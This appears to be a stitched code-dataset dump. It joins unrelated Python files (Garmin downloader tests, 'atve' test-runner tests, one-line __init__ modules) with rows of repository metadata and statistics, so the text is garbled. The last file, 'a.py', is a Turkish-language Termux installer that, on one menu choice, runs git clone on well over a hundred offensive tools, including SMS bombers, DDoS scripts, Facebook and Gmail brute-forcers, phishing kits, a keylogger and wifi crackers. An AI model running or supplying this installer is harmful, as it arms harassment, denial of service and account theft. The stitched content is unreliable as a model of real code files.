for activity, formats in to_download.items():
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_not_found(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
# Download one activity manually first
activity = Activity.from_garmin_activity_list_entry(activities[0])
(tmp_path / ".not_found").write_text(
str(activity.get_export_filepath(tmp_path, "gpx"))
)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 10
for activity, formats in to_download.items():
if len(formats) < len(DEFAULT_FORMATS):
assert "gpx" not in formats
assert set(formats) <= set(DEFAULT_FORMATS)
else:
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_backup_up_to_date(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
# Download everything manually first
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 0
def test_download_with_backup_from_scratch(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
activities = Activities.list(client_activities)
downloader.download_all(activities)
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
def test_download_with_backup_up_to_date(self, client_activities, tmp_path):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Download everything manually first
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
def test_download_with_backup_up_to_date_and_files_not_found(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Download everything manually first and fake that GPX was not found for all activities
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
else:
activity.download(client_activities, fmt, tmp_path)
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
def test_download_with_files_not_found(self, client_activities, tmp_path):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Fake that GPX was not found for all activities
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
assert (
len(list(tmp_path.glob("*"))) == 1
), "There should be a '.not_found' file in the backup directory"
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
def test_download_with_files_not_found_and_some_backed_up(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Fake that GPX was not found for all activities
for activity_entry in activities[:5]:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
else:
activity.download(client_activities, fmt, tmp_path)
assert len(list(tmp_path.glob("*"))) == 5 * (len(DEFAULT_FORMATS) - 1) + 1
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 5 + 1
)
def test_download_one_activity_with_backup_from_scratch(
self, client_activities, tmp_path
):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
activity = Activity.from_garmin_connect(9766544337, client_activities)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_one(activity)
assert len(list(tmp_path.glob("*"))) == len(DEFAULT_FORMATS)
def test_call_for_all_activities(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader()
assert len(list(tmp_path.glob("*"))) == len(
client_activities.list_activities()
) * len(DEFAULT_FORMATS)
def test_call_for_one_activity(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader(activity_id=9766544337)
assert len(list(tmp_path.glob("*"))) == len(DEFAULT_FORMATS)
| 43.246711 | 99 | 0.612383 | 1,379 | 13,147 | 5.531545 | 0.086294 | 0.075249 | 0.05978 | 0.072365 | 0.884767 | 0.871002 | 0.862218 | 0.83967 | 0.835081 | 0.799161 | 0 | 0.007102 | 0.303872 | 13,147 | 303 | 100 | 43.389439 | 0.826377 | 0.04328 | 0 | 0.674699 | 0 | 0 | 0.021021 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.080321 | false | 0 | 0.02008 | 0 | 0.104418 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
888112487e13f62b87bceb9cdb075dab8f1ce776 | 46 | py | Python | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | from sciapp.action import AngleTool as Plugin
| 23 | 45 | 0.847826 | 7 | 46 | 5.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 46 | 1 | 46 | 46 | 0.975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee1695e7f927ab7eee34e7dc81e830d1e437ecd2 | 17 | py | Python | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | 1 | 2020-12-01T22:25:15.000Z | 2020-12-01T22:25:15.000Z | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | null | null | null | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | null | null | null | from . import nld | 17 | 17 | 0.764706 | 3 | 17 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 17 | 1 | 17 | 17 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee21b6d63dc83c96e43079a25473ae8a88674ba1 | 4,794 | py | Python | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | import os
import sys
import mock
from nose.tools import with_setup, raises, ok_, eq_
from atve.application import AtveTestRunner
from atve.workspace import Workspace
from atve.exception import *
class TestAtveTestRunner(object):
@classmethod
def setup(cls):
cls.runner = AtveTestRunner()
cls.root = os.path.normpath(os.path.join(os.path.dirname(__file__)))
cls.script_path = os.path.join(cls.root, "data")
cls.workspace = Workspace(os.path.join(cls.root, "workspace"))
cls.report_path = cls.workspace.mkdir("report")
@classmethod
def teardown(cls):
cls.workspace.rmdir("")
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("success.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_02(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("failed.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("notdefine.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_04(self):
self.runner.execute("notdefine", self.script_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_01(self):
self.runner.execute("notexists.py", self.script_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_02(self):
self.runner.execute("success.py", self.workspace.mkdir("script"))
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("not.pydefine", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) > 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_02(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"failed.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) > 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notdefine.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) == 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_04(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notdefine", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) == 0)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notexists.py", self.script_path, self.report_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_02(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.workspace.mkdir("script"), self.report_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.script_path, os.path.join(self.workspace.root(), "hoge"))
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_04(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"not.pydefine", self.script_path, self.report_path)
| 42.052632 | 92 | 0.683354 | 590 | 4,794 | 5.308475 | 0.098305 | 0.044061 | 0.086845 | 0.105364 | 0.847382 | 0.810026 | 0.776501 | 0.771392 | 0.771392 | 0.755428 | 0 | 0.009759 | 0.187735 | 4,794 | 113 | 93 | 42.424779 | 0.794556 | 0 | 0 | 0.510638 | 0 | 0 | 0.132874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.180851 | false | 0 | 0.074468 | 0 | 0.265957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee90d2d7e748ff35d9b66c4f52534e2db7725491 | 44 | py | Python | sample_image_converter/image_converter/__init__.py | Hiroshiba/instant_api | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | 1 | 2017-09-09T23:25:38.000Z | 2017-09-09T23:25:38.000Z | sample_image_converter/image_converter/__init__.py | Hiroshiba/tornado_instant_webapi | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | null | null | null | sample_image_converter/image_converter/__init__.py | Hiroshiba/tornado_instant_webapi | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | null | null | null | from .image_converter import ImageConverter
| 22 | 43 | 0.886364 | 5 | 44 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a0007963b4f9c9ee3078a7d055c42d952912791a | 30 | py | Python | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 6 | 2015-03-03T13:23:07.000Z | 2021-12-19T18:12:41.000Z | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 95 | 2015-02-07T00:55:39.000Z | 2022-02-08T20:22:05.000Z | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 2 | 2016-03-22T16:53:26.000Z | 2019-02-09T22:46:04.000Z | from .factory_models import *
| 15 | 29 | 0.8 | 4 | 30 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e5f0eeb0028587fba1d9dbbe32d5420501ef6df | 35 | py | Python | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | from LinkShort.linker import Linker | 35 | 35 | 0.885714 | 5 | 35 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e6b32f27b3f290ef17f2e66ed25c4c32fd774d1 | 25,960 | py | Python | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
###SILAH###
os.system("clear")
print("""
_
_-' "'-,
_-' | d$$b |
_-' | $$$$ |
_-' | Y$$P |
_-'| | |
_-' _* | |
_-' |_-" __--''\ /
_-' __--' __*--'
-' __-'' __--*__-"`
| _--'' __--*"__-'`
|_--" .--=`"__-||"
| | |\\ ||
| .dUU | | \\ //
| UUUU | _|___//
| UUUU | |
| UUUU | | [Mrpleak termux kurulum]
| UUUU | |
| UUUU | |
| UUUU | |
| UUP' | |
| ___^-"`
""'
""")
time.sleep(2)
print("KURULUM BAŞLIYOR")
time.sleep(2)
os.system("clear")
os.chdir("/data/data/com.termux/files/home")
###BANNER###
banner = """
a8888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' .88
8`._.' Y8.
d/ `8b.
.dP . Y8b.
d8:' " `::88b.
d8" `Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_ : .| 88P|
\ YP" `| 8P `.
/ \._____.d| .'
`--..__)888888P`._.'
(1 - Toolları kur)
(2 - Komutları kur)
(3 - Çıkış)
"""
print(banner)
secim = input("Seçim Yapınız: ")
if secim == "1":
os.system("git clone https://github.com/ShuBhamg0sain/Hack_CCTV_Cam-v.3.git")
os.system("git clone https://github.com/ShuBhamg0sain/trace-ip.git")
os.system("git clone https://github.com/ShuBhamg0sain/SMSbomber.git")
os.system("git clone https://github.com/Silent-Blue/Wordlist-Creator.git")
os.system("git clone https://github.com/ShuBhamg0sain/wifi-passlist.git")
os.system("git clone https://github.com/ShuBhamg0sain/hack-wifi.git")
os.system("git clone https://github.com/ShuBhamg0sain/reportbug.git")
os.system("git clone https://github.com/ShuBhamg0sain/virous.git")
os.system("git clone https://github.com/ShuBhamg0sain/Locate.git")
os.system("git clone https://github.com/ShuBhamg0sain/Facebook_hack.git")
os.system("git clone https://github.com/ShuBhamg0sain/rootkalilinux-termux.git")
os.system("git clone https://github.com/ShuBhamg0sain/rootubantu-termux.git")
os.system("git clone https://github.com/ShuBhamg0sain/termux_Arch.git")
os.system("git clone https://github.com/govolution/avet")
os.system("git clone https://github.com/ShuBhamg0sain/Facebook-kit.git")
os.system("git clone https://github.com/ShuBhamg0sain/Fbbrute.git")
os.system("git clone https://github.com/thewhiteh4t/seeker.git")
os.system("git clone https://github.com/Findomain/Findomain.git")
os.system("git clone https://github.com/1aN0rmus/TekDefense-Automater.git")
os.system("git clone https://github.com/1N3/BruteX.git")
os.system("git clone https://github.com/1N3/Findsploit.git")
os.system("git clone https://github.com/1N3/ReverseAPK.git")
os.system("git clone https://github.com/1N3/Sn1per.git")
os.system("git clone https://github.com/1tayH/noisy.git")
os.system("git clone https://github.com/4L13199/LITEDDOS.git")
os.system("git clone https://github.com/4L13199/LITESPAM.git")
os.system("git clone https://github.com/4shadoww/hakkuframework.git")
os.system("git clone https://github.com/4w4k3/BeeLogger.git")
os.system("git clone https://github.com/4w4k3/KnockMail.git")
os.system("git clone https://github.com/4w4k3/Umbrella.git")
os.system("git clone https://github.com/4ZM/mfterm.git")
os.system("git clone https://github.com/jimywork/djangohunter.git")
os.system("git clone https://github.com/jimywork/shodanwave.git")
os.system("git clone https://github.com/a0xnirudh/WebXploiter.git")
os.system("git clone https://github.com/abaykan/TrackOut.git")
os.system("git clone https://github.com/abbbe/sslcaudit.git")
os.system("git clone https://github.com/aboul3la/Sublist3r.git")
os.system("git clone https://github.com/AeonDave/doork.git")
os.system("git clone https://github.com/AeonDave/sir.git")
os.system("git clone https://github.com/anggialberto/xl-py.git")
os.system("git clone https://github.com/alexxy/netdiscover.git")
os.system("git clone https://github.com/AlisamTechnology/ATSCAN.git")
os.system("git clone https://github.com/almandin/fuxploider.git")
os.system("git clone https://github.com/abaykan/CrawlBox.git")
os.system("git clone https://github.com/altjx/ipwn.git")
os.system("git clone https://github.com/andresriancho/w3af.git")
os.system("git clone https://github.com/AndroBugs/AndroBugs_Framework.git")
os.system("git clone https://github.com/andyvaikunth/roxysploit.git")
os.system("git clone https://github.com/AonCyberLabs/PadBuster.git")
os.system("git clone https://github.com/aquynh/capstone.git")
os.system("git clone https://github.com/aress31/wirespy.git")
os.system("git clone https://github.com/arismelachroinos/lscript.git")
os.system("git clone https://github.com/ASHWIN990/ADB-Toolkit.git")
os.system("git clone https://github.com/b3-v3r/Hunner.git")
os.system("git clone https://github.com/BagazMukti/Termux-Styling-Shell-Script.git")
os.system("git clone https://github.com/bahaabdelwahed/killshot.git")
os.system("git clone https://github.com/bdblackhat/admin-panel-finder.git")
os.system("git clone https://github.com/beefproject/beef.git")
os.system("git clone https://github.com/behindthefirewalls/Parsero.git")
os.system("git clone https://github.com/bettercap/bettercap.git")
os.system("git clone https://github.com/bleachbit/bleachbit.git")
os.system("git clone https://github.com/jofpin/trape.git")
os.system("git clone https://github.com/byt3bl33d3r/gcat.git")
os.system("git clone https://github.com/bytezcrew/wfdroid-termux.git")
os.system("git clone https://github.com/chinoogawa/fbht.git")
os.system("git clone https://github.com/chrizator/netattack.git")
os.system("git clone https://github.com/chrizator/netattack2.git")
os.system("git clone https://github.com/CiKu370/AUXILE.git")
os.system("git clone https://github.com/CiKu370/hash-generator.git")
os.system("git clone https://github.com/CiKu370/hasher.git")
os.system("git clone https://github.com/CiKu370/ko-dork.git")
os.system("git clone https://github.com/CiKu370/OSIF.git")
os.system("git clone https://github.com/cinquemb/WifiBruteCrack.git")
os.system("git clone https://github.com/CISOfy/lynis.git")
os.system("git clone https://github.com/citronneur/rdpy.git")
os.system("git clone https://github.com/commixproject/commix.git")
os.system("git clone https://github.com/cuckoosandbox/cuckoo.git")
os.system("git clone https://github.com/Cvar1984/Easymap.git")
os.system("git clone https://github.com/Cvar1984/Ecode.git")
os.system("git clone https://github.com/Cvar1984/Hac.git")
os.system("git clone https://github.com/Cvar1984/sqlscan.git")
os.system("git clone https://github.com/cyberark/shimit.git")
os.system("git clone https://github.com/cys3c/secHub.git")
os.system("git clone https://github.com/cyweb/hammer.git")
os.system("git clone https://github.com/D35m0nd142/Kadabra.git")
os.system("git clone https://github.com/D35m0nd142/LFISuite.git")
os.system("git clone https://github.com/D4Vinci/Clickjacking-Tester.git")
os.system("git clone https://github.com/D4Vinci/Dr0p1t-Framework.git")
os.system("git clone https://github.com/D4Vinci/elpscrk.git")
os.system("git clone https://github.com/danielmiessler/SecLists.git")
os.system("git clone https://github.com/darkoperator/dnsrecon.git")
os.system("git clone https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git")
os.system("git clone https://github.com/epsylon/xsser.git")
os.system("git clone https://github.com/errorBrain/spamchat.git")
os.system("git clone https://github.com/digininja/CeWL.git")
os.system("git clone https://github.com/Dionach/CMSmap.git")
os.system("git clone https://github.com/dotfighter/torshammer.git")
os.system("git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git")
os.system("git clone https://github.com/EgeBalci/The-Eye.git")
os.system("git clone https://github.com/Ekultek/Pybelt.git")
os.system("git clone https://github.com/EliasOenal/multimon-ng.git")
os.system("git clone https://github.com/EmpireProject/Empire.git")
os.system("git clone https://github.com/EnableSecurity/sipvicious.git")
os.system("git clone https://github.com/EnableSecurity/wafw00f.git")
os.system("git clone https://github.com/engMaher/BAF.git")
os.system("git clone https://github.com/epinna/weevely3.git")
os.system("git clone https://github.com/deadbits/Intersect-2.5.git")
os.system("git clone https://github.com/derv82/wifite.git")
os.system("git clone https://github.com/derv82/wifite2.git")
os.system("git clone https://github.com/esc0rtd3w/wifi-hacker.git")
os.system("git clone https://github.com/esmog/nodexp.git")
os.system("git clone https://github.com/evait-security/weeman.git")
os.system("git clone https://github.com/archival-0x/dedsploit.git")
os.system("git clone https://github.com/floriankunushevci/rang3r.git")
os.system("git clone https://github.com/FluxionNetwork/fluxion.git")
os.system("git clone https://github.com/fnord0/hURL.git")
os.system("git clone https://github.com/FortyNorthSecurity/EyeWitness.git")
os.system("git clone https://github.com/fwaeytens/dnsenum.git")
os.system("git clone https://github.com/g0tmi1k/msfpc.git")
os.system("git clone https://github.com/galauerscrew/hasherdotid.git")
os.system("git clone https://github.com/galkan/crowbar.git")
os.system("git clone https://github.com/Gameye98/AstraNmap.git")
os.system("git clone https://github.com/Gameye98/Auxscan.git")
os.system("git clone https://github.com/Gameye98/Black-Hydra.git")
os.system("git clone https://github.com/Gameye98/FaDe.git")
os.system("git clone https://github.com/BroNils/GoogleSearch-CLI.git")
os.system("git clone https://github.com/grafov/hulk.git")
os.system("git clone https://github.com/Ha3MrX/Gemail-Hack.git")
os.system("git clone https://github.com/greenbone/openvas-scanner.git")
os.system("git clone https://github.com/GONZOsint/Namechk.git")
os.system("git clone https://github.com/BroNils/GoogleSearch-CLI.git")
os.system("git clone https://github.com/Gameye98/GINF.git")
os.system("git clone https://github.com/Gameye98/inther.git")
os.system("git clone https://github.com/Gameye98/Lazymux.git")
os.system("git clone https://github.com/Gameye98/OWScan.git")
os.system("git clone https://github.com/Gameye98/santet-online.git")
os.system("git clone https://github.com/Gameye98/SpazSMS.git")
os.system("git clone https://github.com/gdabah/distorm.git")
os.system("git clone https://github.com/GDSSecurity/wifitap.git")
os.system("git clone https://github.com/geovedi/indonesian-wordlist.git")
os.system("git clone https://github.com/gitdurandal/dbd.git")
os.system("git clone https://github.com/GitHackTools/Leaked.git")
os.system("git clone https://github.com/gkbrk/slowloris.git")
os.system("git clone https://github.com/golismero/golismero.git")
os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
os.system("git clone https://github.com/grafov/hulk.git")
os.system("git clone https://github.com/greenbone/openvas.git")
os.system("git clone https://github.com/Ha3MrX/Gemail-Hack.git")
os.system("git clone https://github.com/HA71/Namechk.git")
os.system("git clone https://github.com/hacdias/webdav.git")
os.system("git clone https://github.com/Hackplayers/4nonimizer.git")
os.system("git clone https://github.com/the-robot/sqliv.git")
os.system("git clone https://github.com/hashcat/hashcat.git")
os.system("git clone https://github.com/hashcat/maskprocessor.git")
os.system("git clone https://github.com/hatRiot/zarp.git")
os.system("git clone https://github.com/Hax4us/Metasploit_termux.git")
os.system("git clone https://github.com/Hax4us/Nethunter-In-Termux.git")
os.system("git clone https://github.com/Hax4us/TermuxAlpine.git")
os.system("git clone https://github.com/Hood3dRob1n/BinGoo.git")
os.system("git clone https://github.com/Hydra7/Planetwork-DDOS.git")
os.system("git clone https://github.com/i3visio/osrframework.git")
os.system("git clone https://github.com/ihebski/angryFuzzer.git")
os.system("git clone https://github.com/ikkebr/PyBozoCrack.git")
os.system("git clone https://github.com/infobyte/faraday.git")
os.system("git clone https://github.com/iniqua/plecost.git")
os.system("git clone https://github.com/nccgroup/keimpx.git")
os.system("git clone https://github.com/iSECPartners/sslyze.git")
os.system("git clone https://github.com/JamesJGoodwin/wreckuests.git")
os.system("git clone https://github.com/jaygreig86/dmitry.git")
os.system("git clone https://github.com/jesparza/peepdf.git")
os.system("git clone https://github.com/joswr1ght/cowpatty.git")
os.system("git clone https://github.com/jothatron/blackbox.git")
os.system("git clone https://github.com/JPaulMora/Pyrit.git")
os.system("git clone https://github.com/jseidl/GoldenEye.git")
